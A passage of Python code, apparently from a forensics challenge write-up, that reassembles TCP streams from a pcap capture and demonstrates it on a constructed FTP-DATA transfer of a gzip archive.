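    return pad(src, sport) + "-" + pad(dst, dport)

def reassemble(pcap):
    """Return {flow name: bytes} for every unidirectional TCP stream that carried data."""
    assert struct.unpack_from("<I", pcap, 0)[0] == 0xA1B2C3D4, "only LE microsecond pcap handled"
    segments = defaultdict(dict)          # flow name -> {seq: payload}
    off = 24
    while off + 16 <= len(pcap):
        caplen = struct.unpack_from("<IIII", pcap, off)[2]
        frame = pcap[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if frame[12:14] != b"\x08\x00":
            continue                      # not IPv4
        ip = frame[14:]
        ihl, total = (ip[0] & 0x0F) * 4, struct.unpack_from("!H", ip, 2)[0]
        if ip[9] != 6:
            continue                      # not TCP
        tcp = ip[ihl:total]
        sport, dport, seq = struct.unpack_from("!HHI", tcp, 0)
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:                       # pure ACKs carry nothing to write
            name = flow_name(ip[12:16], sport, ip[16:20], dport)
            segments[name].setdefault(seq, payload)   # retransmit: keep the first copy
    streams = {}
    for name, segs in segments.items():
        data, expect = b"", None
        for seq in sorted(segs):          # walk the sequence space upwards
            seg = segs[seq]
            if expect is not None and seq < expect:
                seg = seg[expect - seq:]  # overlap: skip bytes already written
            data += seg
            expect = max(expect or 0, seq + len(segs[seq]))
        streams[name] = data
    return streams

# Constructed FTP-DATA transfer (addresses as in the challenge, bytes invented):
# three segments captured out of order, one of them retransmitted, plus a bare ACK.
FTP_DATA = "193.231.236.041.00020-172.016.001.108.01027"
ARCHIVE = b"\x1f\x8b\x08\x00" + b"TAR-BYTES-" * 3      # gzip magic, then filler

def demo():
    s1, s2, s3 = ARCHIVE[:10], ARCHIVE[10:20], ARCHIVE[20:]
    base = 0x10000000

    def send(seq, data):
        return _frame("193.231.236.41", 20, "172.16.1.108", 1027, seq, 0x18, data)
    frames = [send(base + 10, s2), send(base, s1),
              _frame("172.16.1.108", 1027, "193.231.236.41", 20, 0x2000, 0x10),
              send(base + 10, s2), send(base + 20, s3)]
    return reassemble(make_pcap(frames))

if __name__ == "__main__":
    for name, data in demo().items():
        kind = "gzip archive" if data[:2] == b"\x1f\x8b" else "other"
        print(name, len(data), "bytes,", kind)
```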